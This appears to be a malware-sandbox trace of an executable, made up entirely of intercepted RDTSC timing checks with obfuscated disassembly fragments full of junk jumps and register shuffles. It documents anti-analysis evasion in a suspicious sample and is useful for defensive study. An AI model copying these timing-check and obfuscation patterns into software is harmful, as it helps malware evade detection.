Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57E08E4 second address: 57E0993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e mov cl, bl 0x00000010 popad 0x00000011 ret 0x00000012 nop 0x00000013 push eax 0x00000014 call 00007FD2D16F8D39h 0x00000019 mov edi, edi 0x0000001b jmp 00007FD2CCE08500h 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 mov ebx, 27F9BAE0h 0x00000028 pop ebx 0x00000029 pushfd 0x0000002a jmp 00007FD2CCE08506h 0x0000002f and ecx, 63F4DD28h 0x00000035 jmp 00007FD2CCE084FBh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d jmp 00007FD2CCE08509h 0x00000042 xchg eax, ebp 0x00000043 jmp 00007FD2CCE084FEh 0x00000048 mov ebp, esp 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FD2CCE08507h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57E0993 second address: 57E09FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD2CC8277EFh 0x00000009 jmp 00007FD2CC8277F3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FD2CC8277F8h 0x00000015 xor ax, C6A8h 0x0000001a jmp 00007FD2CC8277EBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD2CC8277F5h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57E09FF second address: 57E0A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CCE084FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790030 second address: 579008C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FD2CC8277F0h 0x00000010 push eax 0x00000011 pushad 0x00000012 mov ax, di 0x00000015 mov ebx, 22796E60h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FD2CC8277EFh 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD2CC8277F5h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 579008C second address: 5790122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 81h 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007FD2CCE08502h 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD2CCE084FEh 0x0000001b jmp 00007FD2CCE08505h 0x00000020 popfd 0x00000021 mov dx, cx 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 pushad 0x00000028 mov di, 69DCh 0x0000002c mov si, di 0x0000002f popad 0x00000030 mov si, di 0x00000033 popad 0x00000034 xchg eax, ecx 0x00000035 jmp 00007FD2CCE08503h 0x0000003a xchg eax, ebx 0x0000003b jmp 00007FD2CCE08506h 0x00000040 push eax 0x00000041 pushad 0x00000042 mov dx, 2704h 0x00000046 mov cx, bx 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790122 second address: 5790126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790126 second address: 5790136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790136 second address: 579015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2CC8277F5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 579015F second address: 579017F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 86DEh 0x00000011 mov ecx, edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 579017F second address: 57901B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov cx, 4789h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop edx 0x00000010 pushfd 0x00000011 jmp 00007FD2CC8277ECh 0x00000016 sbb ecx, 6F6DD6D8h 0x0000001c jmp 00007FD2CC8277EBh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57901B6 second address: 57901BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57901BA second address: 57901C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57901C0 second address: 57901DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CCE08509h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57901DD second address: 5790211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FD2CC8277F9h 0x00000014 jmp 00007FD2CC8277EBh 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790211 second address: 5790270 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD2CCE08508h 0x00000008 sub si, 1D28h 0x0000000d jmp 00007FD2CCE084FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FD2CCE08508h 0x0000001b add ax, 4F88h 0x00000020 jmp 00007FD2CCE084FBh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, edi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790270 second address: 57902E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD2CC8277F2h 0x0000000f or esi, 13C2E518h 0x00000015 jmp 00007FD2CC8277EBh 0x0000001a popfd 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007FD2CC8277F9h 0x00000022 xchg eax, edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD2CC8277F8h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57902E1 second address: 57902E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57902E7 second address: 579031F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FD2CC8277F0h 0x00000010 je 00007FD33DFB5AF0h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD2CC8277EAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 579031F second address: 579032E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 579032E second address: 5790346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790346 second address: 5790398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007FD2CCE08507h 0x00000014 je 00007FD33E5967B5h 0x0000001a jmp 00007FD2CCE08506h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov edx, 27C69570h 0x0000002a mov bx, 989Ch 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790398 second address: 579039E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 579039E second address: 57903A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57903A2 second address: 57903A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57903A6 second address: 57903B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57903B7 second address: 57903CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57903CC second address: 57903D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57903D2 second address: 57903D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57903D6 second address: 57903F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2CCE08502h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57903F8 second address: 5790401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 5FF4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790401 second address: 5790444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007FD33E596776h 0x0000000d jmp 00007FD2CCE08509h 0x00000012 test byte ptr [esi+48h], 00000001h 0x00000016 jmp 00007FD2CCE084FEh 0x0000001b jne 00007FD33E59675Eh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790444 second address: 5790448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790448 second address: 579049D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD2CCE084FAh 0x00000008 sbb si, 4C08h 0x0000000d jmp 00007FD2CCE084FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FD2CCE08508h 0x0000001b adc eax, 7A676E68h 0x00000021 jmp 00007FD2CCE084FBh 0x00000026 popfd 0x00000027 popad 0x00000028 test bl, 00000007h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 579049D second address: 57904A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780862 second address: 5780866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780866 second address: 578086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 578086C second address: 57808B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, si 0x0000000e pushfd 0x0000000f jmp 00007FD2CCE084FAh 0x00000014 sub eax, 024E4A78h 0x0000001a jmp 00007FD2CCE084FBh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD2CCE08504h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57808B8 second address: 578091A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD2CC8277F6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FD2CC8277EDh 0x00000018 adc eax, 34869726h 0x0000001e jmp 00007FD2CC8277F1h 0x00000023 popfd 0x00000024 popad 0x00000025 and esp, FFFFFFF8h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD2CC8277EDh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 578091A second address: 57809B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov esi, 5FC6AE3Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD2CCE084FEh 0x00000017 adc si, 2B28h 0x0000001c jmp 00007FD2CCE084FBh 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FD2CCE08508h 0x00000028 add ah, FFFFFF88h 0x0000002b jmp 00007FD2CCE084FBh 0x00000030 popfd 0x00000031 popad 0x00000032 pushfd 0x00000033 jmp 00007FD2CCE08508h 0x00000038 sbb ax, 3FE8h 0x0000003d jmp 00007FD2CCE084FBh 0x00000042 popfd 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FD2CCE08504h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57809B6 second address: 5780A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov edi, ecx 0x0000000d pushfd 0x0000000e jmp 00007FD2CC8277F0h 0x00000013 xor ch, FFFFFFA8h 0x00000016 jmp 00007FD2CC8277EBh 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f mov edi, ecx 0x00000021 pushad 0x00000022 mov al, 65h 0x00000024 jmp 00007FD2CC8277F3h 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007FD2CC8277F9h 0x00000031 xchg eax, esi 0x00000032 jmp 00007FD2CC8277EEh 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FD2CC8277EAh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780A40 second address: 5780A4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780A4F second address: 5780A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebx, 00000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, 2F81511Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780A6A second address: 5780A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780A6F second address: 5780A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780A75 second address: 5780ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD2CCE08501h 0x00000013 adc si, 4E46h 0x00000018 jmp 00007FD2CCE08501h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FD2CCE08500h 0x00000024 add ecx, 6D9812E8h 0x0000002a jmp 00007FD2CCE084FBh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780ACF second address: 5780B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FD2CC8277EBh 0x0000000c or ax, 8A2Eh 0x00000011 jmp 00007FD2CC8277F9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FD33DFBD071h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780B0F second address: 5780B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780B13 second address: 5780B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780B19 second address: 5780BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000011 jmp 00007FD2CCE084FAh 0x00000016 mov ecx, esi 0x00000018 jmp 00007FD2CCE08500h 0x0000001d je 00007FD33E59DD53h 0x00000023 jmp 00007FD2CCE08500h 0x00000028 test byte ptr [76FA6968h], 00000002h 0x0000002f jmp 00007FD2CCE08500h 0x00000034 jne 00007FD33E59DD39h 0x0000003a jmp 00007FD2CCE08500h 0x0000003f mov edx, dword ptr [ebp+0Ch] 0x00000042 pushad 0x00000043 mov di, si 0x00000046 pushad 0x00000047 jmp 00007FD2CCE08508h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780BAB second address: 5780BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d pushfd 0x0000000e jmp 00007FD2CC8277EFh 0x00000013 add ah, FFFFFFBEh 0x00000016 jmp 00007FD2CC8277F9h 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780BE6 second address: 5780C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD2CCE08507h 0x00000009 sub eax, 1C0BB7CEh 0x0000000f jmp 00007FD2CCE08509h 0x00000014 popfd 0x00000015 mov ch, 05h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FD2CCE084FAh 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD2CCE08507h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780C4B second address: 5780C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ecx, 2AC80033h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780C73 second address: 5780C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov si, di 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780C84 second address: 5780D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FD2CC8277F7h 0x0000000e sub esi, 6A2725FEh 0x00000014 jmp 00007FD2CC8277F9h 0x00000019 popfd 0x0000001a mov ah, 6Ah 0x0000001c popad 0x0000001d push dword ptr [ebp+14h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD2CC8277F4h 0x00000029 and esi, 4D11A428h 0x0000002f jmp 00007FD2CC8277EBh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FD2CC8277F8h 0x0000003b add esi, 52125688h 0x00000041 jmp 00007FD2CC8277EBh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780D20 second address: 5780D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CCE08504h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780D38 second address: 5780D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2CC8277EAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5780DBC second address: 5780E00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esp, ebp 0x0000000c pushad 0x0000000d mov di, 7950h 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FD2CCE084FDh 0x0000001f adc ecx, 21BA41D6h 0x00000025 jmp 00007FD2CCE08501h 0x0000002a popfd 0x0000002b mov si, 1947h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790D71 second address: 5790D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790D77 second address: 5790D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790D7B second address: 5790D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790D7F second address: 5790D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790D8E second address: 5790D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790D92 second address: 5790D98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790B02 second address: 5790B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5790B08 second address: 5790B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
